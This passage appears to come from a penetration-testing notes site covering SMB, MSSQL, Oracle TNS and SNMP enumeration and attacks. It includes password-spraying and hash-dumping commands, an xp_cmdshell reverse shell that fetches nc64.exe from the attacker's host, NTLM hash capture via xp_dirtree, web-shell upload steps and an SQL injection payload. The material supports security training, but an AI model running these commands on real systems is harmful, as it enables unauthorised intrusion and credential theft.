                        The rpcclient offers us many different requests with which we can execute specific functions on the SMB server to get information. A list of some of these functions can be found at rpcclient. Most importantly, anonymous access to such services can also lead to the discovery of other users (see the list of commands for the rpcclient tool), who can be attacked with brute-forcing in the most aggressive case.

                        Brute forcing user enumeration with rpcclient:

                        for i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n

                        Quick cheat sheet:

                        # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" $ip\n# rpcclient -U'%' $ip\n\n# Server information\nsrvinfo\n\n# Enumerate all domains that are deployed in the network \nenumdomains\n\n# Provides domain, server, and user information of deployed domains.\nquerydominfo\n\n# Enumerates all available shares.\nnetshareenumall\n\n# Provides information about a specific share.\nnetsharegetinfo <share>\n\n# Enumerates all domain users.\nenumdomusers\n\n# Provides information about a specific user.\nqueryuser <RID>\n    # An example:\n    # rpcclient $> queryuser 0x3e8\n\n# Provides information about a specific group.\nquerygroup <ID>\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#samrdump-from-impacket","title":"samrdump from impacket","text":"

                        An alternative for user enumeration would be a Python script from Impacket called samrdump.py.
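
                        A minimal sketch of running it, assuming the Impacket example scripts are on the PATH (with no credentials it attempts a null session):

                        samrdump.py $ip\n\n# With credentials\nsamrdump.py <domain>/<username>:<password>@$ip\n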

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#smbmap","title":"SMBMap","text":"

                        The SMBMap tool is widely used and helpful for enumerating SMB services. Quick cheat sheet:

                        # Enumerate network shares and access associated permissions.\nsmbmap -H $ip\n\n# Enumerate network shares and associated permissions recursively\nsmbmap -H $ip -r\n\n# Download a file from a specific share folder\nsmbmap -H $ip --download \"folder\\file.txt\"\n\n# Upload a file to a specific share folder\nsmbmap -H $ip --upload originfile.txt \"targetfolder\\file.txt\"\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#crackmapexec","title":"CrackMapExec","text":"

                        CrackMapExec is widely used and helpful for the enumeration of SMB services.

                        crackmapexec smb $ip --shares -u '' -p ''\n

                        Quick cheat sheet:

                        # Check if we can access a machine\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>\n\n# Spraying password technique\ncrackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targeting a non-domain joined computer, we will need to use the option --local-auth.\n\n# Check which machines we can access in a subnet\ncrackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>\n\n# Get sam: extract hashes from all users authenticated in the machine \ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam\n\n# Get the ntds.dit, given that your user has permissions\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds\n\n# See shares\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares\n\n# Enumerate active sessions\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions\n\n# Enumerate users of the domain\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users\n\n# Enumerate logged on users\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users\n\n# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#enum4linux","title":"Enum4Linux","text":"

                        Complete cheat sheet. Enum4linux is another utility that supports null sessions. It utilizes nmblookup, net, rpcclient, and smbclient to automate common enumeration of SMB targets, such as users, shares, and password policies:

                        ./enum4linux-ng.py 10.10.11.45 -A -C\n

                        Quick cheat sheet:

                        # Enumerate shares\nenum4linux.exe -S $ip\n\n# Enumerate users\nenum4linux.exe -U $ip\n\n# Enumerate machine list\nenum4linux.exe -M $ip\n\n# Display the password policy in case you need to mount a network authentication attack\nenum4linux.exe -enuP $ip\n\n# Specify username to use (default \u201c\u201d)\nenum4linux.exe -u $ip\n\n# Specify password to use (default \u201c\u201d)\nenum4linux.exe -p $ip\n\n# Also you can use brute force by adding a file\nenum4linux.exe -s /usr/share/enum4linux/share-list.txt $ip\n\n# Do a nmblookup (similar to nbtstat)\nenum4linux.exe -n $ip\n# In the result we see the <20> flag which means there are resources shared\n\n# Enumerates the password policy in the remote system. This is useful to use brute force\nenum4linux.exe -P $ip\n\n# Enumerates available shares\nenum4linux.exe -s $ip\n

                        If you want to run all these commands in one line:

                        enum4linux.exe -a $ip\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#interacting-with-smb-using-windows-linux","title":"Interacting with SMB using Windows & Linux","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#windows","title":"Windows","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-the-explorer","title":"Using the explorer","text":"

                        [WINKEY] + [R]\u00a0to open the Run dialog box and type the file share location, e.g.:\u00a0\\\\$IP$\\Finance\\

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-cmd","title":"Using cmd","text":"
                        net use n: \\\\$IP$\\Finance\n# n: map its content to the drive letter\u00a0`n`\n\n\n# Provide user and password\nnet use n: \\\\$IP$\\Finance /user:plaintext Password123\n\n# how many files the shared folder and its subdirectories contain.\ndir n: /a-d /s /b | find /c \":\\\"\n# dir   Application\n# n:    Directory or drive to search\n# /a-d  /a is the attribute and -d means not directories\n# /s    Displays files in a specified directory and all subdirectories\n# /b    Uses bare format (no heading information or summary)\n# | find /c \":\\\\\" :  count how many files exist in the directory and subdirectories\n\n# Return files that contain string \"cred\" in the name\ndir n:\\*cred* /s /b\n\n# Return files that contain string \"password\" within \nfindstr /s /i password n:\\*.*\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-powershell","title":"Using powershell","text":"
                        # List contents of folder Finance\nGet-ChildItem \\\\$IP$\\Finance\\\n\n# Connect to a share \nNew-PSDrive -Name \"N\" -Root \"\\\\$IP\\Finance\" -PSProvider \"FileSystem\"\n\n# To provide a username and password with Powershell, we need to create a PSCredential. It offers a centralized way to manage usernames, passwords, and credentials.\n$username = 'plaintext'\n$password = 'Password123'\n$secpassword = ConvertTo-SecureString $password -AsPlainText -Force\n$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword\nNew-PSDrive -Name \"N\" -Root \"\\\\$IP\\Finance\" -PSProvider \"FileSystem\" -Credential $cred\n\n# Count elements in a folder\n(Get-ChildItem -File -Recurse | Measure-Object).Count\n\n# Return files that contain string \"cred\" in the name\nGet-ChildItem -Recurse -Path N:\\ -Include *cred* -File\n\n# Return files that contain string \"password\" within \nGet-ChildItem -Recurse -Path N:\\ | Select-String \"password\" -List\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#linux","title":"Linux","text":"
                        # mount folder\nsudo mkdir /mnt/Finance\nsudo mount -t cifs -o username=plaintext,password=Password123,domain=. //$IP/Finance /mnt/Finance\n\n# As an alternative, we can use a credential file.\nmount -t cifs //$IP/Finance /mnt/Finance -o credentials=/path/credentialfile\n\n# The file credentialfile has to be structured like this:\n# username=plaintext\n# password=Password123\n# domain=.\n\n# Return files that contain string \"cred\" in the name  \nfind /mnt/Finance/ -name *cred*\n\n# Return files that contain string \"password\" within \ngrep -rn /mnt/Finance/ -ie password\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"1433-mssql/","title":"1433 msSQL","text":"

                        See msSQL.

                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#enumeration","title":"Enumeration","text":"

                        Basic enumeration:

                        nmap -Pn -sV -sC -p1433 $ip\n

                        If you don't know anything about the service:

                        nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip\n\nsudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip\n

                        We can also use Metasploit to run an auxiliary scanner called mssql_ping that will scan the MSSQL service and provide helpful information in our footprinting process.

                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#mssql-ping-in-metasploit","title":"MSSQL Ping in Metasploit","text":"
                        msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248\n\nrhosts => 10.129.201.248\n\n\nmsf6 auxiliary(scanner/mssql/mssql_ping) > run\n\n[*] 10.129.201.248:       - SQL Server information for 10.129.201.248:\n[+] 10.129.201.248:       -    ServerName      = SQL-01\n[+] 10.129.201.248:       -    InstanceName    = MSSQLSERVER\n[+] 10.129.201.248:       -    IsClustered     = No\n[+] 10.129.201.248:       -    Version         = 15.0.2000.5\n[+] 10.129.201.248:       -    tcp             = 1433\n[+] 10.129.201.248:       -    np              = \\\\SQL-01\\pipe\\sql\\query\n[*] 10.129.201.248:       - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#connecting-with-mssqlclientpy","title":"Connecting with Mssqlclient.py","text":"

                        If we can guess or gain access to credentials, this allows us to remotely connect to the MSSQL server and start interacting with databases using T-SQL (Transact-SQL). Authenticating with MSSQL will enable us to interact directly with databases through the SQL Database Engine. From Pwnbox or a personal attack host, we can use Impacket's mssqlclient.py to connect as seen in the output below. Once connected to the server, it may be good to get a lay of the land and list the databases present on the system.

                        python3 mssqlclient.py Administrator@$ip -windows-auth  \n# With python3 mssqlclient.py help you can see more options.\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#basic-mssql-commands","title":"Basic mssql commands","text":"
                        # Get Microsoft SQL server version\nselect @@version;\n\n# Get usernames\nselect user_name()\ngo\n\n# Get databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Get current database\nSELECT DB_NAME()\ngo\n\n# Get a list of users in the domain\nSELECT name FROM master..syslogins\ngo\n\n# Get a list of users that are sysadmins\nSELECT name FROM master..syslogins WHERE sysadmin = 1\ngo\n\n# And to make sure: \nSELECT is_srvrolemember('sysadmin')\ngo\n# If your user is admin, it will return 1.\n\n# Read Local Files in MSSQL\nSELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents\ngo\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#attacks","title":"Attacks","text":"","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#executing-cmd-shell-in-a-sql-command-line","title":"Executing cmd shell in a SQL command line","text":"

                        Our goal can be to spawn a Windows command shell and pass in a string for execution. For that, Microsoft SQL provides the xp_cmdshell command, which allows us to execute operating system commands from the SQL command line.

                        Because malicious users sometimes attempt to elevate their privileges by using xp_cmdshell, it is disabled by default. xp_cmdshell can be enabled and disabled by using Policy-Based Management or by executing sp_configure.

                        sp_configure displays or changes global configuration settings for the current server. This is how you may take advantage of it:

                        # To allow advanced options to be changed.   \nEXECUTE sp_configure 'show advanced options', 1\ngo\n\n# To update the currently configured value for advanced options.  \nRECONFIGURE\ngo\n\n# To enable the feature.  \nEXECUTE sp_configure 'xp_cmdshell', 1\ngo\n\n# To update the currently configured value for this feature.  \nRECONFIGURE\ngo\n

                        Note: The Windows process spawned by\u00a0xp_cmdshell\u00a0has the same security rights as the SQL Server service account

                        Now we can use the msSQL terminal to execute commands:

                        # This will return the .exe files existing in the current directory\nEXEC xp_cmdshell 'dir *.exe'\ngo\n\n# To print a file\nEXECUTE xp_cmdshell 'type c:\\Users\\sql_svc\\Desktop\\user.txt'\ngo\n\n# With this (and a \"python3 -m http.server 80\" from our kali serving a file) we can upload a file to the attacked machine, for instance a reverse shell like nc64.exe\nxp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; wget http://IPfromOurKali/nc64.exe -outfile nc64.exe\"\ngo\n\n# We could also bind this cmd.exe through the nc to our listener. For that open a different tab in kali and do a \"nc -lnvp 443\". When launching the reverse shell, we'll get a powershell terminal in this tab by running:\nxp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; .\\nc64.exe -e cmd.exe IPfromOurKali 443\";\n# You could also upload winPEAS and run it from this powershell command line\n

                        There are other methods to get command execution, such as adding\u00a0extended stored procedures,\u00a0CLR Assemblies,\u00a0SQL Server Agent Jobs, and\u00a0external scripts.

                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#capture-mssql-service-hash","title":"Capture MSSQL Service Hash","text":"

                        We can steal the MSSQL service account hash using\u00a0xp_subdirs\u00a0or\u00a0xp_dirtree\u00a0undocumented stored procedures, which use the SMB protocol to retrieve a list of child directories under a specified parent directory from the file system.

                        When we use one of these stored procedures and point it to our SMB server, the directory listing functionality will force the server to authenticate and send the NTLMv2 hash of the service account that is running the SQL Server.

                        1. First, start Responder or smbserver from impacket.

                        2. Run:

                        # For XP_DIRTREE Hash Stealing\nEXEC master..xp_dirtree '\\\\$KaliIP\\share\\'\n\n# For XP_SUBDIRS Hash Stealing\nEXEC master..xp_subdirs '\\\\$KaliIP\\share\\'\n

                        If the service account has access to our server, we will obtain its hash. We can then attempt to crack the hash or relay it to another host.
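
                        As with the SMB hashes captured earlier with Responder, the NetNTLMv2 hash can be cracked with hashcat mode 5600 (the hash file name below is just an example):

                        hashcat -m 5600 mssql_svc_hash.txt /usr/share/wordlists/rockyou.txt\n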

                        3. XP_SUBDIRS Hash Stealing with Responder

                        sudo responder -I tun0\n

                        4. XP_SUBDIRS Hash Stealing with impacket

                        sudo impacket-smbserver share ./ -smb2support\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#impersonate-existing-users-with-mssql","title":"Impersonate Existing Users with MSSQL","text":"

                        SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends:

                        Impersonating sysadmin

                        # Identify Users that We Can Impersonate\nSELECT distinct b.name \nFROM sys.server_permissions a \nINNER JOIN sys.server_principals b \nON a.grantor_principal_id = b.principal_id \nWHERE a.permission_name = 'IMPERSONATE'\ngo\n\n# Verify if our current user has the sysadmin role:\nSELECT SYSTEM_USER\nSELECT IS_SRVROLEMEMBER('sysadmin')\ngo\n#  value 0 indicates no sysadmin role, value 1 is sysadmin role\n

                        Impersonating sa user

                        USE master\nEXECUTE AS LOGIN = 'sa'\nSELECT SYSTEM_USER\nSELECT IS_SRVROLEMEMBER('sysadmin')\ngo\n

                        It's recommended to run EXECUTE AS LOGIN within the master DB, because all users, by default, have access to that database.

                        To revert the operation and return to our previous user

                        REVERT\ngo\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#communicate-with-other-databases-with-mssql","title":"Communicate with Other Databases with MSSQL","text":"

                        MSSQL\u00a0has a configuration option called\u00a0linked servers. Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.

                        If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.

                        # Identify linked Servers in MSSQL\nSELECT srvname, isremote FROM sysservers\ngo\n
                        srvname                             isremote\n----------------------------------- --------\nDESKTOP-MFERMN4\\SQLEXPRESS          1\n10.0.0.12\\SQLEXPRESS                0\n\n\n# isremote, where 1 means is a remote server, and 0 is a linked server. \n
                        #  Identify the user used for the connection and its privileges:\nEXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]\ngo \n\n# The\u00a0[EXECUTE](https://docs.microsoft.com/en-us/sql/t-sql/language-elements/execute-transact-sql)\u00a0statement can be used to send pass-through commands to linked servers. We add our command between parenthesis and specify the linked server between square brackets (`[ ]`).\n

                        If we need to use quotes in a query sent to the linked server, we must double the single quotes to escape them. To run multiple commands at once, we can separate them with a semicolon (;).
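
                        For example, a sketch against the linked server listed above (the doubled single quotes escape the literal, and the semicolon separates the two statements):

                        EXECUTE('SELECT name FROM master..syslogins WHERE name = ''sa''; SELECT @@version') AT [10.0.0.12\\SQLEXPRESS]\ngo\n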

                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#sources-and-resources","title":"Sources and resources","text":"
                        • nc64.exe.
                        • Impacket: mssqlclient.py.
                        • Pentesmonkey Cheat sheet.
                        • book.hacktricks.xyz.
                        • winPEAS.
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1521-oracle-transparent-network-substrate/","title":"1521 - Oracle Transparent Network Substrate (TNS)","text":"

                        The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. TNS supports various networking protocols between Oracle databases and client applications, such as IPX/SPX and TCP/IP protocol stacks. As a result, it has become a preferred solution for managing large, complex databases in the healthcare, finance, and retail industries.

                        Additionally, it supports IPv6 and SSL/TLS encryption, which makes it suitable for name resolution, connection management, load balancing, and security.

                        Oracle TNS is often used with other Oracle services like Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, web servers, and many more:

                        • Oracle Enterprise Manager: a tool to start, stop, or restart an instance, adjust its memory allocation and other configuration parameters, and monitor its performance.
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#footprinting-oracle-tns","title":"Footprinting Oracle TNS","text":"

                        Let's now use nmap to scan the default Oracle TNS listener port:

                        sudo nmap -p1521 -sV $ip --open\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#enumerating-sids","title":"Enumerating SIDs","text":"

                        In Oracle relational databases, also known as Oracle RDBMS, there are System Identifiers (SID).

                        A System Identifier (SID) is a unique name that identifies a particular database instance. A database can have multiple instances, each with its own SID. An instance is a set of processes and memory structures that interact to manage the database's data.

                        The client uses this SID to identify which database instance it wants to connect to. If the request does not include a SID, the default value defined in the tnsnames.ora file is used.

                        sudo nmap -p1521 -sV $ip --open --script oracle-sid-brute\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#more-enumeration-with-odat","title":"More enumeration with ODAT","text":"

                        We can use odat.py from the ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations, and more.

                        ./odat.py all -s $ip\n

                        Additionally, if you have sysdba admin rights, you might upload a web shell to the target (more in odat).

                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#connect-to-oracle-database-sqlplus","title":"Connect to Oracle database: sqlplus","text":"

                        If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

                        sqlplus <username>/<password>@$ip/XE;\n

                        In case of this error message (sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory), there might be an issue with the libraries. A possible solution:

                        sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\";sudo ldconfig\n

                        The System Database Admin in an Oracle RDBMS is sysdba. If a user has more privileges than they should, we can try to exploit this by connecting as sysdba:

                        sqlplus <user>/<password>@$ip/XE as sysdba\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#upload-a-web-shell","title":"Upload a web shell","text":"

                        If we have sysdba admin rights, we might upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.

                        # 1. Create a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n\n# 2. Upload  the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n\n## 3. Test if the file upload approach worked with curl, or visit via browser.\ncurl -X GET http://$ip/testing.txt\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#oracle-basic-commands","title":"Oracle basic commands","text":"
                        # List all available tables in the current database\nselect table_name from all_tables;\n\n# Show the privileges of the current user\nselect * from user_role_privs;\n\n# If we have sysdba admin rights, we might:\n    ## 1. enumerate all databases\nselect * from user_role_privs;\n\n    ## 2. extract Password Hashes\nselect name, password from sys.user$;\n\n    ## 3. upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.\n    ## 1. Creating a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n    ## 2. Uploading the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#how-does-oracle-tns-work","title":"How does Oracle TNS work","text":"","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#technical-components","title":"Technical components","text":"

                        The listener:

                        By default, the listener listens for incoming connections on the TCP/1521 port. However, this default port can be changed during installation or later in the configuration file. The TNS listener is configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk. The listener can also support multiple network interfaces and listen on specific IP addresses or all available network interfaces. By default, Oracle TNS can be remotely managed in Oracle 8i/9i but not in Oracle 10g/11g.

                        Additionally, the listener will use Oracle Net Services to encrypt the communication between the client and the server.

                        Configuration files for Oracle TNS

                        The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. The client-side Oracle Net Services software uses the tnsnames.ora file to resolve service names to network addresses, while the listener process uses the listener.ora file to determine the services it should listen to and the behavior of the listener.

                        tnsnames.ora

                        Each database or service has a unique entry in the tnsnames.ora file, containing the necessary information for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the database or service name that clients should use when connecting to the service.

                        ORCL =\n  (DESCRIPTION =\n    (ADDRESS_LIST =\n      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))\n    )\n    (CONNECT_DATA =\n      (SERVER = DEDICATED)\n      (SERVICE_NAME = orcl)\n    )\n  )\n

                        listener.ora

                        The listener.ora file is a server-side configuration file that defines the listener process's properties and parameters, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance.

                        SID_LIST_LISTENER =\n  (SID_LIST =\n    (SID_DESC =\n      (SID_NAME = PDB1)\n      (ORACLE_HOME = C:\\oracle\\product\\19.0.0\\dbhome_1)\n      (GLOBAL_DBNAME = PDB1)\n      (SID_DIRECTORY_LIST =\n        (SID_DIRECTORY =\n          (DIRECTORY_TYPE = TNS_ADMIN)\n          (DIRECTORY = C:\\oracle\\product\\19.0.0\\dbhome_1\\network\\admin)\n        )\n      )\n    )\n  )\n\nLISTENER =\n  (DESCRIPTION_LIST =\n    (DESCRIPTION =\n      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))\n      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))\n    )\n  )\n\nADR_BASE_LISTENER = C:\\oracle\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#default-passwords","title":"Default passwords","text":"
                        • Oracle 9 has a default password, CHANGE_ON_INSTALL.
                        • Oracle 10 has no default password set.
                        • The Oracle DBSNMP service also uses a default password, dbsnmp.
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#plsql-exclusion-list","title":"PL/SQL Exclusion List","text":"

                        Oracle databases can be protected by using a so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution. Once the PL/SQL Exclusion List file is created, it can be loaded into the database instance. It serves as a blacklist of packages and types that cannot be accessed through the Oracle Application Server.

                        Settings and their descriptions:

                        • DESCRIPTION: A descriptor that provides a name for the database and its connection type.
                        • ADDRESS: The network address of the database, which includes the hostname and port number.
                        • PROTOCOL: The network protocol used for communication with the server.
                        • PORT: The port number used for communication with the server.
                        • CONNECT_DATA: Specifies the attributes of the connection, such as the service name or SID, protocol, and database instance identifier.
                        • INSTANCE_NAME: The name of the database instance the client wants to connect to.
                        • SERVICE_NAME: The name of the service that the client wants to connect to.
                        • SERVER: The type of server used for the database connection, such as dedicated or shared.
                        • USER: The username used to authenticate with the database server.
                        • PASSWORD: The password used to authenticate with the database server.
                        • SECURITY: The type of security for the connection.
                        • VALIDATE_CERT: Whether to validate the certificate using SSL/TLS.
                        • SSL_VERSION: The version of SSL/TLS to use for the connection.
                        • CONNECT_TIMEOUT: The time limit in seconds for the client to establish a connection to the database.
                        • RECEIVE_TIMEOUT: The time limit in seconds for the client to receive a response from the database.
                        • SEND_TIMEOUT: The time limit in seconds for the client to send a request to the database.
                        • SQLNET.EXPIRE_TIME: The time limit in seconds for the client to detect a connection has failed.
                        • TRACE_LEVEL: The level of tracing for the database connection.
                        • TRACE_DIRECTORY: The directory where the trace files are stored.
                        • TRACE_FILE_NAME: The name of the trace file.
                        • LOG_FILE: The file where the log information is stored.
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#extra-bonus-dual","title":"Extra Bonus: DUAL","text":"

                        DUAL is a special one-row, one-column table present by default in all Oracle databases. The owner of DUAL is SYS, but it can be accessed by every user. This is a possible payload for SQLi:

                        '+UNION+SELECT+NULL+FROM+dual--\n

                        Oracle syntax requires the use of FROM, but some queries don't require any table; in those cases we use DUAL. Also, Oracle doesn't allow queries that employ information_schema.tables.
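
                        A short sketch of both points (run from a SQL client such as sqlplus):

                        -- A SELECT with no real table still needs FROM, so DUAL is used\nSELECT 1+1 FROM dual;\n\n-- Oracle has no information_schema.tables; table names come from all_tables instead\nSELECT table_name FROM all_tables;\n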

                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"161-162-snmp/","title":"161-162 SNMP Simple Network Management Protocol","text":"

                        Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behaviour.

                        Simple Network Management Protocol (SNMP) was created to monitor network devices. In addition, this protocol can also be used to handle configuration tasks and change settings remotely. SNMP-enabled hardware includes routers, switches, servers, IoT devices, and many other devices that can also be queried and controlled using this standard protocol. Thus, it is a protocol for monitoring and managing network devices.

                        Managers: one or more administrative computers that have the task of monitoring or managing a group of hosts or devices (the managed devices) on a computer network.

                        Managed devices: routers, switches, servers, IoT devices, and many other devices.

                        Agent: network-management software module that resides on a managed device. An agent has local knowledge of management information and translates that information to or from an SNMP-specific form.

                        In addition to the pure exchange of information, SNMP:

                        • Transmits control commands using agents over UDP port 161.
                        • Enables the use of so-called traps over UDP port 162. These are data packets sent from the SNMP server to the client without being explicitly requested. If a device is configured accordingly, an SNMP trap is sent to the client once a specific event occurs on the server-side.

                        Management Information Base (MIB): For the SNMP client and server to exchange the respective values, the available SNMP objects must have unique addresses known on both sides. This is where the MIB comes in.

                        MIB is an independent format for storing device information. A MIB is a text file in which all queryable SNMP objects of a device are listed in a standardized tree hierarchy. MIB files are written in the Abstract Syntax Notation One (ASN.1) based ASCII text format.

                        They contain at least one Object Identifier (OID), which, in addition to the necessary unique address and a name, provides information about the type, access rights, and a description of the respective object. An OID represents a node in a hierarchical namespace. A sequence of numbers uniquely identifies each node, allowing the node's position in the tree to be determined. The longer the chain, the more specific the information. Many nodes in the OID tree contain nothing except references to those below them. The OIDs consist of integers and are usually concatenated in dot notation.
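
                        For example, 1.3.6.1.2.1.1.5.0 is the OID for a device's sysName. A sketch of translating between the textual and numeric forms with snmptranslate (from the net-snmp tools):

                        # Name to numeric OID\nsnmptranslate -On SNMPv2-MIB::sysName.0\n# .1.3.6.1.2.1.1.5.0\n\n# Numeric OID back to its full textual path\nsnmptranslate -Of .1.3.6.1.2.1.1.5.0\n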

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#snmpv1-snmpv2-and-snmpv3","title":"SNMPv1, SNMPv2 and SNMPv3","text":"

                        SNMP version 1 (SNMPv1) is used for network management and monitoring. SNMPv1 has no built-in authentication mechanism, meaning anyone accessing the network can read and modify network data. Another main flaw of SNMPv1 is that it does not support encryption, meaning that all data is sent in plain text and can be easily intercepted.

                        SNMPv2 existed in different versions. The version that still exists today is v2c; the extension c stands for community-based SNMP. A significant problem with the initial execution of the SNMP protocol is that the community string that provides security is only transmitted in plain text, meaning it has no built-in encryption.

                        SNMPv3: The security has been increased enormously for SNMPv3 by security features such as authentication using username and password and transmission encryption (via pre-shared key) of the data. However, the complexity also increases to the same extent, with significantly more configuration options than v2c.

